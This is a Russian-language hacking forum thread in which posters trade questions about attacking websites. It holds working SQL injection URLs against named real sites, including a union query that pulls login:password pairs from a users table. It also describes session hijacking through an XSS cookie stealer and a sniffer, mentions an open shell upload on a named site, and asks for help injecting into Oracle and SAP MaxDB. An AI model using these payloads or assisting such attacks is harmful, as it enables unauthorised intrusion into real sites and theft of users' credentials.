Ваши вопросы по уязвимостям.

Так проверьте же. Кука может быть не одна, может быть еще на одном домене, может быть привязка к ip. А скорее всего привязка к user-agent'у.

 

Немного поэксперементировав я пришел к некому результату но всёже это ещё не результат...

Залогинился в опере, заюзал xss , открыл сниифер - куки уже тут.
Открываю фаерфокс и плагин в нем (Live http replay)
мне нужен был именно он так как очень просто можно заменить все куки запроса

Вобщем открываю главную, ловлю запрос , меняю в нем куки на те что пришли на сниффер, повторяю запрос и вижу что я типо залогинен с почты которая насамом деле открыта у меня в опере.
Конечно же зайти на неё не удалось так как куки переданные плагином не сохранились в браузер.

Переберал все возможные комбинации и оказалось что для этого хватит всего одной куки Mpop и страница также будет показывать что я якобы залогинен.

А если куку Mpop просто сунуть в браузер и сохранить то она умрет и меня попросит ввести пассворд повторно.

 

Народ, помогите вывести таблицы..

Code:

http://bigtoys.com.ua/index.php?route=product/category&path=106+or+1+group+by+concat(version(),floor(rand(0)*%202))having+min(0)+or+1

 

SELECT 1 from information_schema.tables group by concat((SELECT table_name from information_schema.tables limit 0,1),floor(rand(0)*2)) having min(0)

 

В Opencart скуля?

 

Там фильтруется нижнее подчеркивание.

 

В общем заюзал на одном сайте Nginx stack-based buffer overflow
Он выдал вот такую инфу



Как это можно использовать.. Для чего эти байты?

 

HTTP parameter pollution что за уязвимость?

 

Зайди в гугл, ввел HTTP parameter pollution.
Открой первую вкладку http://raz0r.name/articles/http-parameter-pollution и прочитай.

 

приветствую
понять не могу что за база
на "
SearchEngineException: parsefql: Query Error: line 1:100: unexpected token:
,linguistics=off),boost=1000), not(*.swf), not(*filtertable*), not(*multimedia_layer_library*), not(*.flash.html), not(*.isng.*), not(*tabcontent*), not(*Search_Results*), not(*medialibrary*), not(*.ngrb.*), not(*media_library*), not(*.pid.*), not(*.redirect.*),filter(and(language:

")ORDER BY 1
SearchEngineException: parsefql: Query Error: line 1:100: unexpected token: ORDER
")and(select null)
SearchEngineException: parsefql: Query Error: line 1:111: unexpected token: null

хелп..

 

Посоветуйте пожалуйста нормальный гуи для sqlmap
Особенно важна поддержка иньекций в куках

 

Подскажите пример реализации

https://www.site.com/login

POST

PARAM: firstN=&lastN=

DB: ORACLE

c чего начать?

 

В разделе ИЗБРАННОЕ смотрел?

 

Почему, когда пытаюсь сдампить бд, некоторые поля сохраняются пустыми?
Пробовал Havij и sqlmap

 

Уверен,что там есть данные?ручками пробовал?

 

А вы таки вообще уверены, что в записях с этими полями поля по факту не пустые? И какие у вас привилегии на системе?

 

Есть сайт со скулей

Code:

http://kerch.biz/news/view.php?id=-328+union+/*!select*/+1,2,3,concat%28login,0x3a,password%29,5,6+FROM+users+--+

и админка но ни одна из учёток не подходит. Расскажите, в чём подвог?

2. Не подбирается кол-во столбцов.

Code:

www.tmk-group.com/structure.php?flr_id=179+and+1=0+order+by+1+--+

 

http://kerch.biz/upload.php
Спокойно шелл грузится.

 

подскажите по базе SAP MaxDB
не могу найти статей про это базу как скуль ижект делать в ней.
блинд